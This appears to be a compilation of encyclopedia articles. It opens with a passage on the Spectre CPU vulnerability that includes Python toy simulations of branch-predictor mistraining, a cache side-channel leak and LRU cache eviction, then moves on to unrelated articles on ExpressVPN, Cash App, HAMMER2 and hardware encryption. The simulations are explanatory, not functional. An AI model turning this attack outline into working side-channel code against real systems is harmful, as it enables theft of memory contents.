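# all names are illustrative simplifications.

LINE = 4096
array1 = [1, 2, 3, 4]                         # victim's in-bounds data
memory = {i: ord(c) for i, c in enumerate("SECRET", start=len(array1))}

class BranchPredictor:
    def __init__(self):
        self.counter = 0                      # 2-bit saturating counter
    def predict_taken(self):
        return self.counter >= 2
    def update(self, taken):
        self.counter = min(3, self.counter + 1) if taken else max(0, self.counter - 1)

def victim(index, predictor, cache):
    in_bounds = index < len(array1)
    if predictor.predict_taken() and not in_bounds:
        # Misprediction: the speculative window runs on the stale "in-bounds"
        # guess, reads out of bounds, and leaks the value via the cache.
        value = memory[index]                 # transient out-of-bounds read
        cache.add(value * LINE)               # dependent access leaves a trace
    predictor.update(in_bounds)               # real outcome resolves later
    return array1[index] if in_bounds else None

predictor, cache = BranchPredictor(), set()
for i in [0, 1, 2, 3, 0, 1]:                  # training: branch always in-bounds
    victim(i, predictor, cache)
victim(4, predictor, cache)                   # malicious out-of-bounds index

leaked = next(line // LINE for line in cache)
print(chr(leaked))                            # 'S' -- first secret byte
```

Step three of the paper – the timing measurement that distinguishes the cached line from uncached ones – is abstracted here into the set-membership lookup.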
Meltdown can be used to read privileged memory in a process's address space which even the process itself would normally be unable to access (on some unprotected OSes this includes data belonging to the kernel or other processes). It was shown that, under certain circumstances, the Spectre vulnerability is also capable of reading memory outside of the current process's memory space. The Meltdown paper distinguishes the two vulnerabilities thus: "Meltdown is distinct from the Spectre Attacks in several ways, notably that Spectre requires tailoring to the victim process's software environment, but applies more broadly to CPUs and is not mitigated by KAISER."

Remote exploitation

While Spectre is simpler to exploit with a compiled language such as C or C++ by locally executing machine code, it can also be remotely exploited by code hosted on remote malicious web pages, for example in interpreted languages like JavaScript, which run locally using a web browser. The scripted malware would then have access to all the memory mapped to the address space of the running browser. The exploit using remote JavaScript follows a similar flow to that of a local machine-code exploit: flush cache → mistrain branch predictor → timed reads (tracking hit/miss). The unavailability of the clflush instruction (cache-line flush) in JavaScript requires an alternative approach. There are several automatic cache eviction policies which the CPU may choose, and the attack relies on being able to force that eviction for the exploit to work. It was found that using a second index on the large array, which was kept several iterations behind the first index, would cause the least recently used (LRU) policy to be used. This allows the exploit to effectively clear the cache just by doing incremental reads on a large dataset.
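The two-index eviction trick can be illustrated with a small LRU cache model: the trailing reads keep recently used buffer lines "hot", so older lines (including the one the attacker wants out of the cache) are steadily pushed out without any flush instruction. The `LRUCache` class, the capacity, and the `LAG` value are all illustrative choices, not measured parameters.

```python
# Sketch of the JavaScript eviction trick using a small LRU cache model:
# without clflush, reading a large buffer with a second index trailing the
# first steadily evicts older lines. Sizes here are illustrative.

from collections import OrderedDict

class LRUCache:
    def __init__(self, capacity):
        self.capacity, self.lines = capacity, OrderedDict()
    def access(self, line):
        self.lines.pop(line, None)
        self.lines[line] = True               # most recently used at the end
        if len(self.lines) > self.capacity:
            self.lines.popitem(last=False)    # evict least recently used

cache = LRUCache(capacity=8)
cache.access("victim-line")                   # line the attacker wants evicted

LAG = 4
buffer_lines = 32
for i in range(buffer_lines):
    cache.access(f"buf[{i}]")                 # leading index walks forward
    if i >= LAG:
        cache.access(f"buf[{i - LAG}]")       # trailing index re-touches
                                              # recent lines, pushing out others

print("victim-line" in cache.lines)           # False -- evicted without clflush
```

In a real browser exploit the same pattern is applied to a large typed array so that the hardware's replacement policy, rather than an explicit flush, clears the probe lines between measurements.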
The branch predictor would then be mistrained by iterating over a very large dataset using bitwise operations for setting the index to in-range values, and then using an out-of-bounds address for the final iteration. A high-precision timer would then be required in order to determine whether a set of reads led to a cache hit or a cache miss. While browsers like Chrome, Firefox, and Tor Browser (based on Firefox) have placed restrictions on the resolution of timers (which the Spectre exploit requires to distinguish cache hits from misses), at the time of authoring the white paper, the Spectre authors were able to create a high-precision timer using the web worker feature of HTML5. Careful coding and analysis of the machine code executed by the just-in-time (JIT) compiler was required to ensure the cache-clearing and exploitative reads were not optimized out. Impact As of 2018, almost every computer system is affected by Spectre, including desktops, laptops, and mobile devices. Specifically, Spectre has been shown to work on Intel, AMD, ARM-based, and IBM processors. Intel responded to the reported security vulnerabilities with an official statement. AMD originally acknowledged vulnerability to one of the Spectre variants (GPZ variant 1), but stated that vulnerability to another (GPZ variant 2) had not been demonstrated on AMD processors, claiming it posed a "near zero risk of exploitation" due to differences in AMD architecture. In an update nine days later, AMD said that "GPZ Variant 2...is applicable to AMD processors" and defined upcoming steps to mitigate the threat. Several sources took AMD's news of the vulnerability to GPZ variant 2 as a change from AMD's prior claim, though AMD maintained that their position had not changed. Researchers have indicated that the Spectre vulnerability can possibly affect some Intel, AMD, and ARM processors. Specifically, processors with speculative execution are affected by these vulnerabilities.
ARM has reported that the majority of their processors are not vulnerable, and published a list of the specific processors that are affected by the Spectre vulnerability: Cortex-R7, Cortex-R8, Cortex-A8, Cortex-A9, Cortex-A15, Cortex-A17, Cortex-A57, Cortex-A72, Cortex-A73 and Cortex-A75 cores. Other manufacturers' custom CPU cores implementing the ARM instruction set, such as those found in newer members of the Apple A series processors, have also been reported to be vulnerable. In general, higher-performance CPUs tend to make intensive use of speculative execution, making them vulnerable to Spectre. Spectre has the potential for a greater impact on cloud providers than Meltdown. Whereas Meltdown allows unauthorized applications to read from privileged memory to obtain sensitive data from processes running on the same cloud server, Spectre can allow malicious programs to induce a hypervisor to transmit the data to a guest system running on top of it. Mitigation Since Spectre represents a whole class of attacks, there most likely cannot be a single patch for it. While work is already being done to address special cases of the vulnerability, the original website devoted to Spectre and Meltdown states: "As [Spectre] is not easy to fix, it will haunt us for a long time." At the same time, according to Dell: "No 'real-world' exploits of these vulnerabilities [i.e., Meltdown and Spectre] have been reported to date [7 February 2018], though researchers have produced proof-of-concepts." Several procedures to help protect home computers and related devices from the vulnerability have been published. Spectre patches have been reported to significantly slow down performance, especially on older computers; on the newer eighth-generation Core platforms, benchmark performance drops of 2–14 percent have been measured. On 18 January 2018, unwanted reboots caused by the Meltdown and Spectre patches were reported even on newer Intel chips.
It has been suggested that the cost of mitigation can be alleviated by processors which feature selective translation lookaside buffer (TLB) flushing, a feature which is called process-context identifier (PCID) under Intel 64 architecture, and under Alpha, an address space number (ASN). This is because selective flushing enables the TLB behavior crucial to the exploit to be isolated across processes, without constantly flushing the entire TLB, which is the primary reason for the cost of mitigation. In March 2018, Intel announced that they had developed hardware fixes for Meltdown and Spectre-V2 only, but not Spectre-V1. The vulnerabilities were mitigated by a new partitioning system that improves process and privilege-level separation. On 8 October 2018, Intel was reported to have added hardware and firmware mitigations addressing the Spectre and Meltdown vulnerabilities to its Coffee Lake-R processors and onwards. On 2 March 2019, Microsoft was reported to have released an important Windows 10 (v1809) software mitigation for the Spectre v2 CPU vulnerability. Particular software Since exploitation of Spectre through JavaScript embedded in websites is possible, it was planned to include mitigations against the attack by default in Chrome 64. Chrome 63 users could manually mitigate the attack by enabling the Site Isolation feature (chrome://flags#enable-site-per-process).
As of Firefox 57.0.4, Mozilla was reducing the resolution of JavaScript timers to help prevent timing attacks, with additional work on time-fuzzing techniques planned for future releases. On 15 January 2018, Microsoft introduced a mitigation for Spectre in Visual Studio. It can be applied by using the /Qspectre switch. A developer would need to download and install the appropriate libraries using the Visual Studio installer. General approaches On 4 January 2018, Google detailed a new technique on their security blog called "Retpoline" (return trampoline) which can overcome the Spectre vulnerability with a negligible amount of processor overhead. It involves compiler-level steering of indirect branches towards a different target that does not result in a vulnerable speculative out-of-order execution taking place. While it was developed for the x86 instruction set, Google engineers believe the technique is transferable to other processors as well. On 25 January 2018, the current status and possible future considerations in solving the Meltdown and Spectre vulnerabilities were presented. On 18 October 2018, MIT researchers suggested a new mitigation approach, called DAWG (Dynamically Allocated Way Guard), which may promise better security without compromising performance. On 16 April 2019, researchers from UC San Diego and the University of Virginia proposed Context-Sensitive Fencing, a microcode-based defense mechanism that surgically injects fences into the dynamic execution stream, protecting against a number of Spectre variants at just 8% degradation in performance. Controversy When Intel announced that Spectre mitigation can be switched on as a "security feature" instead of being an always-on bugfix, Linux creator Linus Torvalds called the patches "complete and utter garbage". Ingo Molnár then suggested the use of the function tracing machinery in the Linux kernel to fix Spectre without Indirect Branch Restricted Speculation (IBRS) microcode support.
This would, as a result, only have a performance impact on processors based on Intel Skylake and newer architectures. This ftrace and retpoline-based machinery was incorporated into Linux 4.15, released in January 2018. Immune hardware ARM: A53 A32 A7 A5 See also Foreshadow (security vulnerability) Microarchitectural Data Sampling Row hammer SPOILER (security vulnerability) Transient execution CPU vulnerabilities References Further reading External links Website detailing the Meltdown and Spectre vulnerabilities, hosted by Graz University of Technology Google Project Zero write-up Meltdown/Spectre Checker Gibson Research Corporation Spectre & Meltdown vulnerability/mitigation checker for Linux Speculative execution security vulnerabilities Hardware bugs Side-channel attacks 2018 in computing X86 architecture X86 memory management
56209375
https://en.wikipedia.org/wiki/ExpressVPN
ExpressVPN
ExpressVPN is a VPN service offered by the British Virgin Islands-registered company Express Technologies Ltd. The software is marketed as a privacy and security tool that encrypts users' web traffic and masks their IP addresses. In September 2021, it was reported that the service was being used by 3 million users. Also in September 2021, ExpressVPN was purchased by software developer Kape Technologies, formerly Crossrider, an adware platform. Kape also owns other VPN services and cybersecurity tools. History ExpressVPN's parent company, Express VPN International Ltd, was founded in 2009 by Peter Burchhardt and Dan Pomerantz, two serial entrepreneurs who were also Wharton School alumni. The parent company does business as ExpressVPN. On January 25, 2016, ExpressVPN announced that it would soon roll out an upgraded CA certificate. Also in December, ExpressVPN released open source leak testing tools on GitHub. In July 2017, ExpressVPN announced in an open letter that Apple had removed all VPN apps from its App Store in China, a revelation that was later picked up by The New York Times and other outlets. In response to questions from U.S. Senators, Apple stated it had removed 674 VPN apps from the App Store in China in 2017 at the request of the Chinese government. In December, ExpressVPN came into the spotlight in relation to the investigation of the assassination of the Russian ambassador to Turkey, Andrei Karlov. Turkish investigators seized an ExpressVPN server which they said was used to delete relevant information from the assassin's Gmail and Facebook accounts. Turkish authorities were unable to find any logs to aid their investigation, which the company said verified its claim that it did not store user activity or connection logs, adding: "While it's unfortunate that security tools like VPNs can be abused for illicit purposes, they are critical for our safety and the preservation of our right to privacy online.
ExpressVPN is fundamentally opposed to any efforts to install 'backdoors' or attempts by governments to otherwise undermine such technologies." In December 2019, ExpressVPN became a founding member of the VPN Trust Initiative, an advocacy group for online safety of consumers. In May 2020, the company released a new protocol it developed for ExpressVPN called Lightway, designed to improve connectivity speeds and reduce power consumption. In October, Yale Privacy Lab founder Sean O'Brien joined the ExpressVPN Digital Security Lab to conduct original research in the areas of privacy and cybersecurity. On September 13, 2021, it was reported that ExpressVPN had been acquired by Kape Technologies, an LSE-listed digital privacy and security company which operates three other VPN services: Private Internet Access, CyberGhost and ZenMate; antivirus software maker Intego; and other cybersecurity tools. This raised concerns based on Kape Technologies' predecessor Crossrider's history of making tools that were used for adware. At the time of the acquisition, ExpressVPN reportedly had over 3 million users. ExpressVPN announced in September 2021 that they would remain a separate service from existing Kape brands. On September 14, the US Department of Justice released a statement that ExpressVPN CIO Daniel Gericke, prior to joining the company, had helped the United Arab Emirates hack computers (including those of activists) without having a valid export license from the US government. In exchange for a deferred prosecution agreement, he agreed to pay a $335,000 fine and his security clearance was revoked. Features ExpressVPN has released apps for Windows, macOS, iOS, Android, Linux, and routers. The apps use a 4096-bit CA, AES-256-CBC encryption, and TLSv1.2 to secure user traffic. Available VPN protocols include Lightway, OpenVPN (with TCP/UDP), SSTP, L2TP/IPSec, and PPTP. 
The software also features a Smart DNS feature called MediaStreamer, to add VPN capabilities to devices that do not support them, and a router app, allowing the VPN to be set up on a router to cover unsupported devices such as gaming consoles. ExpressVPN is incorporated in the British Virgin Islands, a privacy-friendly country that has no data retention laws and is a separate legal jurisdiction from the United Kingdom. ExpressVPN's parent company also develops leak testing tools, which enable users to determine if their VPN provider is leaking network traffic, DNS requests, or true IP addresses while connected to the VPN, such as when switching from a wireless to a wired internet connection. Servers ExpressVPN's network of 3,000 servers covered 160 VPN server locations across 94 countries. In April 2019, ExpressVPN announced that all their VPN servers ran solely on volatile memory (RAM), not on hard drives. This was the first example of such a server security setup in the VPN industry, and was referred to as TrustedServer. Lightway protocol Lightway is ExpressVPN's open source VPN protocol. It is similar to the WireGuard protocol, but uses wolfSSL encryption to improve speed on embedded devices such as routers and smartphones. It does not run in the operating system's kernel, and is kept lightweight to support auditing. It is reportedly twice as fast as OpenVPN, and supports TCP and UDP. Reception TorrentFreak has included ExpressVPN in their annual comparison of Best VPN providers since 2015. On January 14, 2016, ExpressVPN was criticized by former Google information security engineer Marc Bevand for using weak encryption. Bevand had discovered that only a 1024-bit RSA key was used to encrypt the service's connections after using it to test the strength of the Great Firewall of China. He described ExpressVPN as "one of the top three commercial VPN providers in China" and asserted that the Chinese government would be able to factor the RSA keys to potentially spy on users.
On February 15, Bevand updated his criticism and noted that the company had reported to him that it switched to more secure 4096-bit RSA keys. In a review by PCMag UK editor Max Eddy in May 2017, the service scored 4 out of 5, with the bottom line being that although the service was not the fastest, it "certainly protects your data from thieves and spies." PC World rated the service 3½ out of 5 in their September 2017 review, commending it for its easy-to-use software while criticizing "the secrecy behind who runs the company." In October 2017, TechRadar gave the service 4½ out of 5 stars, calling it "a premium service with well-crafted clients, an ample choice of locations and reliable performance." In 2018, cybersecurity website Comparitech ran ExpressVPN's leak testing tools against 11 popular VPN services and found leaks across every VPN provider, with the exception of ExpressVPN. However, they clarified, "To be fair, ExpressVPN built the test tools and applied them to its own VPN app prior to publication of this article, so it has already patched leaks that it initially detected." The service received 4.5 out of 5 stars from VPNSelector in their July 2019 review, putting it in first place among VPN providers. In 2020, tech publication TechRadar named ExpressVPN its editor's choice. In 2021, TechRadar and CNET named the service their Editors' Choice. See also Comparison of virtual private network services References External links ExpressVPN's official website Internet privacy Internet properties established in 2009 Virtual private network services Software companies Information technology companies of the British Virgin Islands YouTube sponsors
56276869
https://en.wikipedia.org/wiki/HAMMER2
HAMMER2
HAMMER2 is a successor to the HAMMER filesystem, redesigned from the ground up to support enhanced clustering. HAMMER2 supports online and batched deduplication, snapshots, directory entry indexing, multiple mountable filesystem roots, mountable snapshots, a low memory footprint, compression, encryption, zero-detection, data and metadata checksumming, and synchronization to other filesystems or nodes. History The HAMMER2 file system was conceived by Matthew Dillon, who initially planned to bring it up to a minimal working state by July 2012 and ship the final version in 2013. During Google Summer of Code 2013, Daniel Flores implemented compression in HAMMER2 using the LZ4 and zlib algorithms. On June 4, 2014, DragonFly 3.8.0 was released featuring support for HAMMER2, although the file system was said to be not ready for use. On October 16, 2017, DragonFly 5.0 was released with bootable support for HAMMER2, though the file system's status was marked as experimental. HAMMER2 had a long incubation and development period before it officially entered production in April 2018, as the recommended root filesystem in the DragonFly BSD 5.2 release. Dillon continues to actively develop and maintain HAMMER2 as of June 2020. See also Comparison of file systems List of file systems ZFS Btrfs OpenZFS References External links DragonFly BSD Distributed file systems 2014 software
56282618
https://en.wikipedia.org/wiki/MarkAny
MarkAny
MarkAny Inc. is an information security company headquartered in Seoul, South Korea. MarkAny holds technologies including DRM, anti-forgery of electronic documents, digital signatures, and digital watermarking. Based on these technologies, MarkAny offers information security products for data protection, document encryption, electronic certification, and copyright protection. History MarkAny was founded in February 1999 by Professor Choi Jong-uk and his graduate students at Sangmyung University. In 2002, MarkAny provided an anti-forgery and physical copy protection solution for the electronic certificate issuing system of the Gangnam-gu Office, and in 2003, for the National Tax Service of South Korea and the Supreme Court of South Korea. MarkAny later supplied its anti-forgery solution to more than 200 companies and government agencies worldwide. MarkAny entered the business of securing digital CCTV footage in 2013 by providing a video data management system for the CCTV control center of the Tongyeong City Government. In 2014, MarkAny provided its audio watermarking solution to Seoul Broadcasting System, a South Korean television station. Since 2017, MarkAny has been a member of the Ultra HD Forum and has supported the creation of a forensic watermarking guideline together with other watermarking vendors. At the 2017 NAB Show, MarkAny demonstrated real-time embedding of a forensic watermark in a UHD video stream. In late 2017, MarkAny announced its first cloud-based DRM solution. Products provided by the company include DRM for documents and multimedia content, mobile device management, and digital watermarking for copyrighted multimedia. Controversy MarkAny's digital watermarking technology has been controversial, and issues have been raised due to its intrusive ability to monitor and modify media files, unbeknownst to the end user, by enveloping itself as part of a software bundle.
This "watermarking" feature stores a personally identifiable tracking ID within obscure extension subtags permitted in these formats, and has been discovered to "call home" to servers in the background. Its active attempts to conceal the DRM from normal OS I/O operations, making files appear free of any alteration, all without the user's permission or notification, have led to advisories on its rootkit and malware characteristics. Affiliations As of January 2018, MarkAny is a member company of the Digital Watermarking Alliance and a contributor member of the Ultra HD Forum. References External links Information technology companies of South Korea Technology companies established in 1999 South Korean companies established in 1999 Companies based in Seoul Security companies of South Korea South Korean brands
56289457
https://en.wikipedia.org/wiki/Cash%20App
Cash App
Cash App (formerly known as Square Cash) is a mobile payment service developed by Block, Inc. that allows users to transfer money to one another (for a 1.5% fee for immediate transfers) using a mobile phone app. The service is only available in the US and the UK. In September 2021, the service reported 70 million annual transacting users and $1.8 billion in gross profit. History Cash App was launched by Square, Inc. (the former name of Block, Inc.) on October 15, 2013 under the name "Square Cash". In March 2015, Square introduced Square Cash for businesses. This allowed individuals, organizations, and business owners to create a unique username, known as a $cashtag, to send and receive money. Since then, the $cashtag has become the most popular method for users to transfer money. In January 2018, Cash App added support for bitcoin trading. In October 2019, Cash App added support for stock trading for users in the United States. In November 2020, Square announced it was acquiring Credit Karma Tax, a free do-it-yourself tax-filing service, for $50 million and would make it a part of its Cash App unit. On November 3, 2021, Square opened up Cash App to teenagers between the ages of 13 and 17. The app previously required its users to be at least 18 years old. Younger teens require a parent or guardian to authorize their account and do not have access to bitcoin or stock trading until they turn 18. Services Banking The service allows users to send, receive, and store money. Users can transfer money out of Cash App to any local bank account. The Cash Card is a customizable debit card that allows users to spend their money at various retailers and withdraw cash from an ATM. When signing up for the Cash Card, users can customize it by selecting a color, adding stamps, drawing on it, and even making the card glow in the dark. Once the custom design is finalized, the card is sent to the user through the mail.
As of March 7, 2018, the Cash App supports automated clearing house (ACH) direct deposits. Peer-to-peer money transfer Users can request and transfer money to other Cash App accounts via phone number, email, or $cashtag. The $cashtag acts as a unique username for the user's account and can only be changed twice. When transferring money, users can optionally add a message to be sent to the counterparty. Cash App provides two options to transfer money into a third-party bank account: wait 3–5 business days for a free transfer, or withdraw instantly for a 1.5% fee. This is despite advertising that transfers are "fast and free" and "Fast payments for free". Unverified accounts may only send $250/week and receive $1,000/month. In order to verify an account, a user must submit their legal name, date of birth, and the last four digits of their social security number. Verification raises the weekly sending limit to $7,500 and completely removes the receiving limit. Cryptocurrency In 2018, the capability to buy and sell bitcoin was added to the app. Users can also send bitcoin to each other using their $cashtag, deposit bitcoin into the app from another source, and withdraw their bitcoin to an external wallet. Unlike other cryptocurrency exchanges, buying and selling bitcoin on Cash App is instant and does not require confirmation on the blockchain. Currently, Cash App only supports bitcoin and has not announced any plans to support other cryptocurrencies in the future. Investing In 2020, the capability to trade stocks was added to the app for US residents only. Users can buy and sell fractional shares of most publicly traded companies with a minimum of $1. Stock trading follows standard market hours of 9:30 am – 4:00 pm EST and can be managed from the app’s investing section. Stock trading is currently not available to minors on Cash App.
Finances As of November 1, 2021, Square has a market capitalization of $117.4 billion. Its largest market competitor is PayPal, which owns Venmo. Other major competitors include Apple Pay, Google Pay, and Zelle. Business model Cash App is free to download on the Google Play Store, Apple App Store, and other mobile store platforms. Because the basic app is free, it incentivizes more users to create an account and use its services. If users want additional services other than a standard money transfer, Cash App charges small percentage fees and/or initial fixed costs to generate revenue. Cash App's primary revenue stream comes from users withdrawing funds from the app to their linked bank accounts, either free over 3–5 business days or instantly for a 1.5% fee. If users don’t have a direct deposit account with the app, they will be charged a $2 fee for withdrawing money from an ATM. Cash App also allows users to buy and sell bitcoin from their platform for a small service fee based on the current bitcoin market volatility. Businesses can also accept Cash App as a form of payment and are charged a transaction cost of 2.75%. Similar to banks, Cash App will occasionally loan out money from users' accounts to various institutions. By doing so, it earns interest and creates revenue, a process known as money creation. In the case of a bank run, Cash App is required to hold 10% of users' account liquidity as part of fractional-reserve banking. Safety and protection policies Cash App uses a combination of encryption and fraud detection technologies to help secure users' data and money. All data is encrypted and sent to Square’s secure servers regardless of the connection type (public and private WiFi and all forms of mobile data). If fraud is detected at any point during a transaction, Cash App will automatically cancel the transaction.
To further increase security, upon signing into an account, a user is sent a one-time use login code by SMS or email. Cash App includes an option in its settings labeled Security Lock. This provides users an extra step of protection as it requires users to enter their password before completing any transaction. Fraud and illicit activity There has been a reported history of scams via Cash App. Common scams include customer support impersonation, fake offers and programs, flipping, and the selling of fake expensive items. Many of these scams are hard to dispute, offering little buyer protection in comparison to services like PayPal. Since the start of COVID-19 pandemic and the rise in use of payment apps, there has been a notable increase in reported scams. In one instance, a man was scammed out of $24,000 due to customer support impersonation. In another instance, a scammer used the public video of a female Waffle House worker holding a baby in a kitchen to fabricate an emotional story. The scammer used social media to share their Cash App information in hopes of receiving donations from unsuspecting victims that wanted to help out. Millennials frequently utilize payment platforms like Cash App and Venmo to pay for illegal drugs or gamble. In June 2021, police in West Baltimore arrested seven people for using Cash App as a means to sell cocaine and heroin to nearby neighborhoods. Cultural impact In 2018, Cash App surpassed Venmo in total downloads (33.5 million cumulative), becoming one of the most popular peer-to-peer payment platforms available. Cash App is mentioned by about 200 hip-hop artists in their song lyrics, leading some to assert that it is now "ingrained in hip-hop culture," with its popularity stemming from African American communities in the Atlanta area. Some cite the early adoption of cryptocurrencies among members of the rap community as another reason for Cash App's cultural cachet. 
The popularity of the app in hip-hop is reflected in Square's partnerships with prominent rappers, such as Travis Scott, Megan Thee Stallion, and Cardi B. Social media influencers frequently use Cash App to request donations from their followers. Every Friday since 2017, Twitter users retweet posts from the official Cash App account with the #SuperCashAppFriday hashtag to potentially win $10,000 to $50,000. These posts often have a notable amount of engagement. References External links Block, Inc. Online payments Mobile payments 2013 software
56314778
https://en.wikipedia.org/wiki/SecureTribe
SecureTribe
SecureTribe is an iOS-based secure image-sharing and video-sharing app, designed from the ground up with end-to-end encryption. SecureTribe is used by over 3.8 million users as an alternative to Instagram and Snapchat, as a place to securely connect with family and friends and share photos without worrying about hackers stealing or interfering with the user's data. SecureTribe allows users to create unique groups, called Tribes, where they can post pictures and videos, organized into albums. Users can then choose to make a Tribe visible publicly or only to approved friends. The owner of a Tribe can allow or disable the ability for others to upload into the Tribe or to save a copy of files from it. No content can be shared or accidentally leaked from Tribe to Tribe; content can only be shared within the Tribe, though users can also choose to share content publicly. Users can subscribe to Tribes created by their friends and will see new posts in the What's New Timeline. Unless a user is invited to a Tribe, they will not know that the Tribe exists, allowing more privacy than other group messaging apps. Technology Use cases Sharing artistic expression with friends without government censors Parents sharing baby pictures with friends and family Bands, models, and stand-up comedians sharing VIP content with fans See also List of Image Sharing Websites References External links American photography websites Online mass media companies of the United States IOS software Mobile software Photo software Video software
56353049
https://en.wikipedia.org/wiki/Fast%20and%20Secure%20Protocol
Fast and Secure Protocol
The Fast Adaptive and Secure Protocol (FASP) is a proprietary data transfer protocol. FASP is a network-optimized transfer protocol developed by Aspera, owned by IBM. The associated client/server software packages are also commonly called Aspera. The technology is patented under US Patent #20090063698, Method and system for aggregate bandwidth control. Similar to the connectionless UDP protocol, FASP does not expect any feedback on every packet sent. Only packets that are actually lost must be requested again by the recipient. As a result, it does not suffer as much loss of throughput as TCP does on networks with high latency or high packet loss. Large organizations like IBM, the European Nucleotide Archive, the US National Institutes of Health National Center for Biotechnology Information and others use the protocol in different areas. Amazon also wants to use the protocol for uploading to its data centers. Security FASP has built-in security mechanisms that do not affect the transmission speed. The encryption algorithms used are based exclusively on open standards. Before the transfer, SSH is used for key exchange for authentication. These randomly generated one-time keys are discarded at the end of the transmission. The data is encrypted or decrypted immediately before sending and after receiving with AES-128. To counteract attacks that monitor the encrypted information during long transfers, AES is operated in cipher feedback mode with a secret initialization vector for each block. In addition, an integrity check of each data block takes place, so that, for example, a man-in-the-middle attack would be noticed. Protocol FASP's control port is TCP port 22, the same port that SSH uses. For data transfer, it begins at UDP port 33001, which increments with each additional connection thread. See also Tsunami UDP Protocol UDP-based Data Transfer Protocol (UDT) QUIC GridFTP References Internet protocols Internet Standards Transport layer protocols
https://en.wikipedia.org/wiki/Hardware-based%20encryption
Hardware-based encryption
Hardware-based encryption is the use of computer hardware to assist software, or sometimes replace software, in the process of data encryption. Typically, this is implemented as part of the processor's instruction set. For example, the AES encryption algorithm (a modern cipher) can be implemented using the AES instruction set on the ubiquitous x86 architecture. Such instructions also exist on the ARM architecture. However, more unusual systems exist where the cryptography module is separate from the central processor, instead being implemented as a coprocessor, in particular a secure cryptoprocessor or cryptographic accelerator, of which an example is the IBM 4758, or its successor, the IBM 4764. Hardware implementations can be faster and less prone to exploitation than traditional software implementations, and furthermore can be protected against tampering.

History
Prior to the use of computer hardware, cryptography could be performed through various mechanical or electro-mechanical means. An early example is the scytale used by the Spartans. The Enigma machine was an electro-mechanical cipher machine notably used by the Germans in World War II. After World War II, purely electronic systems were developed. In 1987 the ABYSS (A Basic Yorktown Security System) project was initiated. The aim of this project was to protect against software piracy. However, the application of computers to cryptography in general dates back to the 1940s and Bletchley Park, where the Colossus computer was used to break the encryption used by the German High Command during World War II. The use of computers to encrypt, however, came later. In particular, until the development of the integrated circuit, of which the first was produced in 1960, computers were impractical for encryption, since, in comparison to the portable form factor of the Enigma machine, computers of the era took the space of an entire building.
It was only with the development of the microcomputer that computer encryption became feasible outside of niche applications. The development of the World Wide Web led to the need for consumers to have access to encryption, as online shopping became prevalent. The key concerns for consumers were security and speed. This led to the eventual inclusion of the key algorithms into processors as a way of increasing both speed and security.

Implementations
In the instruction set

x86
The x86 architecture, as a CISC (Complex Instruction Set Computer) architecture, typically implements complex algorithms in hardware. Cryptographic algorithms are no exception: the x86 architecture implements significant components of the AES (Advanced Encryption Standard) algorithm, which the NSA has approved for protecting Top Secret information. The architecture also includes support for the SHA hashing algorithms through the Intel SHA extensions. Whereas AES is a cipher, useful for encrypting documents, hashing is used for verification, such as of passwords (see PBKDF2).

ARM
ARM processors can optionally support Security Extensions. Although ARM is a RISC (Reduced Instruction Set Computer) architecture, there are several optional extensions specified by ARM Holdings.

As a coprocessor
IBM 4758 – The predecessor to the IBM 4764. This includes its own specialised processor, memory and a random number generator.
IBM 4764 and IBM 4765 – Identical except for the connection used: the former uses PCI-X, while the latter uses PCIe. Both are peripheral devices that plug into the motherboard.

Proliferation
Advanced Micro Devices (AMD) processors are also x86 devices, and have supported the AES instructions since the 2011 Bulldozer processor iteration. Due to the existence of encryption instructions on modern processors provided by both Intel and AMD, the instructions are present on most modern computers. They also exist on many tablets and smartphones due to their implementation in ARM processors.
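Password hashing of the kind mentioned above (see PBKDF2) is available directly in Python's standard library; the iteration count below is an illustrative value, not a recommendation.

```python
import hashlib
import os

def hash_password(password: str, salt: bytes, iterations: int = 100_000) -> bytes:
    # PBKDF2 repeatedly applies HMAC-SHA-256 so that each password guess
    # is expensive; hardware SHA extensions accelerate exactly this workload.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)

salt = os.urandom(16)
stored = hash_password("correct horse", salt)
# Verification re-derives the hash from the supplied password and salt;
# identical inputs yield the identical digest.
assert hash_password("correct horse", salt) == stored
assert hash_password("wrong guess", salt) != stored
```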
Advantages
Implementing cryptography in hardware means that part of the processor is dedicated to the task. This can lead to a large increase in speed. In particular, modern processor architectures that support pipelining can often perform other instructions concurrently with the execution of the encryption instruction. Furthermore, hardware can have methods of protecting data from software. Consequently, even if the operating system is compromised, the data may still be secure (see Software Guard Extensions).

Disadvantages
If, however, the hardware implementation is compromised, major issues arise. Malicious software can retrieve the data from the (supposedly) secure hardware – a large class of such methods is the timing attack. This is far more problematic to solve than a software bug, even one within the operating system. Microsoft regularly deals with security issues through Windows Update. Similarly, regular security updates are released for Mac OS X and Linux, as well as mobile operating systems like iOS, Android, and Windows Phone. However, hardware is a different issue. Sometimes, the issue will be fixable through updates to the processor's microcode (a low-level type of software). However, other issues may only be resolvable through replacing the hardware, or through a workaround in the operating system which mitigates the performance benefit of the hardware implementation, as with the Spectre exploit.

See also
Disk encryption hardware
Hardware-based full disk encryption
Hardware security module
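Timing attacks of the class mentioned above exploit data-dependent run time. A classic software-level illustration is secret comparison: a naive byte-by-byte compare returns early at the first mismatch, leaking how many leading bytes were correct, which is why libraries provide constant-time alternatives. A minimal sketch:

```python
import hmac

def naive_equal(a: bytes, b: bytes) -> bool:
    # Returns as soon as a byte differs -- run time depends on the secret,
    # which an attacker can measure over many attempts.
    if len(a) != len(b):
        return False
    for x, y in zip(a, b):
        if x != y:
            return False
    return True

secret = b"supersecrettoken"
guess = b"supersecretXXXXX"

# hmac.compare_digest examines every byte regardless of where the
# mismatch occurs, so its timing does not reveal the matching prefix.
assert naive_equal(secret, secret)
assert not hmac.compare_digest(secret, guess)
```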
https://en.wikipedia.org/wiki/Intel%20Microcode
Intel Microcode
Intel microcode is microcode that runs inside x86 processors made by Intel. Since the P6 microarchitecture, introduced in the mid-1990s, the microcode programs can be patched by the operating system or BIOS firmware to work around bugs found in the CPU after release. Intel had originally designed microcode updates for processor debugging under its design for testing (DFT) initiative. Following the Pentium FDIV bug, the patchable microcode function took on a wider purpose to allow in-field updating without needing to do a product recall. In the P6 and later microarchitectures, x86 instructions are internally converted into simpler RISC-style micro-operations that are specific to a particular processor and stepping level.

Micro-operations
